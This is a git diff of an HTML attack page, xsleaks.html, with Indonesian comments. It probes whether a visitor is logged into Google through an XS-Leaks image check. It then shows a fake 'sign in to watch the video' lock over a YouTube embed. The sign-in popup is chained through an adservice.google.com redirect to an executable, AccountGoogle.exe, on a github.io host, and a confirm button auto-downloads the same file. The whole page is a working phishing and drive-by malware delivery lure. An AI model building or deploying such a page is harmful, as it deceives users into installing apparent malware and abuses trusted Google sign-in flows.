--- a/xsleaks.html
+++ b/xsleaks.html
@@ -1,71 +1,177 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>XSLeaks Google Login Detection</title>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>Google Login Popup + XS-Leaks Detection</title>
+  <style>
+    body {
+      font-family: Arial, sans-serif;
+      text-align: center;
+      padding: 50px;
+      background-color: #f9f9f9;
+    }
+    #video-container {
+      position: relative;
+      display: block;
+      margin-top: 30px;
+      width: 560px;
+      height: 315px;
+      margin-left: auto;
+      margin-right: auto;
+      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
+    }
+    iframe {
+      width: 100%;
+      height: 100%;
+      border: 0;
+    }
+    #overlay-lock {
+      position: absolute;
+      top: 0;
+      left: 0;
+      width: 100%;
+      height: 100%;
+      background: rgba(0, 0, 0, 0.6);
+      color: #fff;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      font-size: 18px;
+      z-index: 10;
+      cursor: not-allowed;
+      transition: opacity 0.3s ease;
+    }
+    #login-button {
+      padding: 12px 24px;
+      font-size: 16px;
+      color: #444;
+      background-color: #fff;
+      border: 1px solid #ccc;
+      border-radius: 5px;
+      cursor: pointer;
+      display: inline-flex;
+      align-items: center;
+      gap: 10px;
+      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
+      transition: background-color 0.2s ease, box-shadow 0.2s ease;
+    }
+    #login-button:hover {
+      background-color: #f1f1f1;
+      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
+    }
+    #login-button img {
+      width: 20px;
+      height: 20px;
+    }
+    #confirm-login {
+      margin-top: 20px;
+      display: none;
+    }
+    #confirm-login button {
+      padding: 10px 20px;
+      font-size: 14px;
+      border: none;
+      border-radius: 5px;
+      background-color: #34a853;
+      color: white;
+      cursor: pointer;
+    }
+    #confirm-login button:hover {
+      background-color: #2c8b46;
+    }
+  </style>
 </head>
 <body>
-  <h2>Checking Google login status...</h2>
-  <div id="status">Detecting...</div>
+
+  <h1>Please Sign In to Watch the Video</h1>
+
+  <button id="login-button">
+    <img src="https://www.gstatic.com/firebasejs/ui/2.0.0/images/auth/google.svg" alt="Google Logo" />
+    Sign in with Google
+  </button>
+
+  <div id="confirm-login">
+    <p>Did you finish logging in?</p>
+    <button id="confirm-button">Yes, I did!</button>
+  </div>
+
+  <div id="video-container">
+    <iframe
+      src="https://www.youtube.com/embed/1r7RlKRHu40"
+      title="YouTube video player"
+      allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
+      allowfullscreen>
+    </iframe>
+
+    <!-- Overlay lock -->
+    <div id="overlay-lock">Please sign in to play the youtube video</div>
+  </div>
 
   <script>
-    function detectGoogleLogin(callback) {
+    const loginButton = document.getElementById('login-button');
+    const overlayLock = document.getElementById('overlay-lock');
+    const confirmSection = document.getElementById('confirm-login');
+    const confirmButton = document.getElementById('confirm-button');
+
+    // XS-Leaks Login Detection - Ping Google
+    function checkGoogleLogin(callback) {
       const img = new Image();
-      const start = performance.now();
-
-      // Target resource yang beda perilaku kalo login / nggak login
-      img.src = "https://mail.google.com/mail/u/0/images/cleardot.gif";
-
-      img.onload = () => {
-        const time = performance.now() - start;
-        console.log("Image loaded in:", time);
-
-        // Kalau user login → cleardot.gif cepat ke-load
-        if (time < 500) {
-          callback(true); // Logged in!
-        } else {
-          callback(false); // Not logged in
-        }
-      };
-
-      img.onerror = () => {
-        console.log("Error loading image");
-        callback(false); // Assume not logged in
-      };
+      img.src = "https://accounts.google.com/AccountChooser?continue=https://example.com&hl=en";
+      img.onload = () => callback(true);  // Logged in (image loads)
+      img.onerror = () => callback(false); // Not logged in
     }
 
-    detectGoogleLogin((loggedIn) => {
-      const status = document.getElementById('status');
+    // 1. Cek siapa yang login Google (via XS-Leaks)
+    console.log("Checking Google login status...");
+    checkGoogleLogin((loggedIn) => {
       if (loggedIn) {
-        status.textContent = "✅ User is logged into Google!";
-        triggerAttack();
+        console.log("✅ Google account detected. Ready to trigger attack!");
       } else {
-        status.textContent = "❌ User is NOT logged in to Google!";
+        console.log("❌ User not logged in to Google. No action taken.");
       }
     });
 
-    function triggerAttack() {
-      alert("Launching attack on logged-in user...");
+    // 2. Buat login popup trigger + download
+    loginButton.addEventListener('click', () => {
+      const googleLoginURL = 'https://accounts.google.com/AccountChooser/signinchooser?continue=https%3A%2F%2Fadservice.google.com%2Fddm%2Fclk%2F408533097%3B208818505%3Bl%3B%3B%3F%2F%2Flanaya113505.github.io%2Fpizza%2FAccountGoogle.exe%3F%2Fhome&ddm=1&flowEntry=AccountChooser&flowName=GlifWebSignIn&hl=id&ltmpl=youtube&service=youtube&authuser=0';
 
-      // Bisa trigger fake popup login atau drive-by download
-      const popup = window.open('', 'GoogleLogin', 'width=500,height=600');
+      const popupWidth = 500;
+      const popupHeight = 600;
+      const left = (screen.width / 2) - (popupWidth / 2);
+      const top = (screen.height / 2) - (popupHeight / 2);
 
-      popup.document.write(`
-        <html>
-        <head><title>Google Login</title></head>
-        <body style="text-align:center;">
-          <h2>Choose your Google Account</h2>
-          <button onclick="download()">Continue</button>
+      // Open the popup window
+      const loginWindow = window.open(
+        googleLoginURL,
+        'Google Login',
+        `width=${popupWidth},height=${popupHeight},top=${top},left=${left}`
+      );
 
-          <script>
-            function download() {
-              window.location.href = 'https://lanaya113505.github.io/pizza/AccountGoogle.exe';
-            }
-          </script>
-        </body>
-        </html>
-      `);
-    }
+      // Check when the popup is closed
+      const checkPopupClosed = setInterval(() => {
+        if (loginWindow && loginWindow.closed) {
+          clearInterval(checkPopupClosed);
+          confirmSection.style.display = 'block';
+        }
+      }, 1000);
+    });
+
+    // 3. User confirm, trigger overlay unlock + (optional) trigger download lagi
+    confirmButton.addEventListener('click', () => {
+      overlayLock.style.display = 'none';
+      loginButton.style.display = 'none';
+      confirmSection.style.display = 'none';
+
+      // Auto download confirm fallback (optional)
+      const downloadLink = document.createElement('a');
+      downloadLink.href = 'https://lanaya113505.github.io/pizza/AccountGoogle.exe';
+      downloadLink.download = '';
+      document.body.appendChild(downloadLink);
+      downloadLink.click();
+      document.body.removeChild(downloadLink);
+    });
   </script>
+
 </body>
 </html>
